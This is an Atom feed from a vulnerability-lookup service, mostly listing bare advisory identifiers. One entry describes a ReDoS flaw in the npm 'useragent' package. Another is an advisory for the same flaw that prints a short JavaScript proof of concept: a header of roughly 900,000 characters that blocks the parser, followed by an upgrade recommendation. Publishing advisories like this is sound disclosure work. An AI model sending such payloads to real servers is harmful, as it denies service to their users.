<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-09T20:51:21.207130+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cnvd-2018-25045</id>
    <title>cnvd-2018-25045</title>
    <updated>2026-10-09T20:51:21.276968+00:00</updated>
    <content>cnvd-2018-25045</content>
    <link href="https://cve.radiocsirt.org/vuln/cnvd-2018-25045"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-178481</id>
    <title>EUVD-2026-178481</title>
    <updated>2026-10-09T20:51:21.277021+00:00</updated>
    <content>EUVD-2026-178481</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-178481"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2017-16030</id>
    <title>fkie_cve-2017-16030</title>
    <updated>2026-10-09T20:51:21.277036+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Useragent is used to parse useragent headers. It uses several regular expressions to accomplish this. An attacker could edit their own headers, creating an arbitrarily long useragent string, causing the event loop and server to block. This affects Useragent 2.1.12 and earlier.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2017-16030"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-pjmx-9xr3-82qr</id>
    <title>GHSA-pjmx-9xr3-82qr — ReDoS via long UserAgent header in useragent</title>
    <updated>2026-10-09T20:51:21.277071+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: useragent</p>
<p>Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed.</p>
<p>## Proof of Concept
```js
var useragent = require('useragent');</p>
<p>var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
```</p>
<p>## Recommendation</p>
<p>Update to version 2.1.13 or later.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-pjmx-9xr3-82qr"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/gsd-2017-16030</id>
    <title>gsd-2017-16030</title>
    <updated>2026-10-09T20:51:21.277104+00:00</updated>
    <content>gsd-2017-16030</content>
    <link href="https://cve.radiocsirt.org/vuln/gsd-2017-16030"/>
  </entry>
</feed>
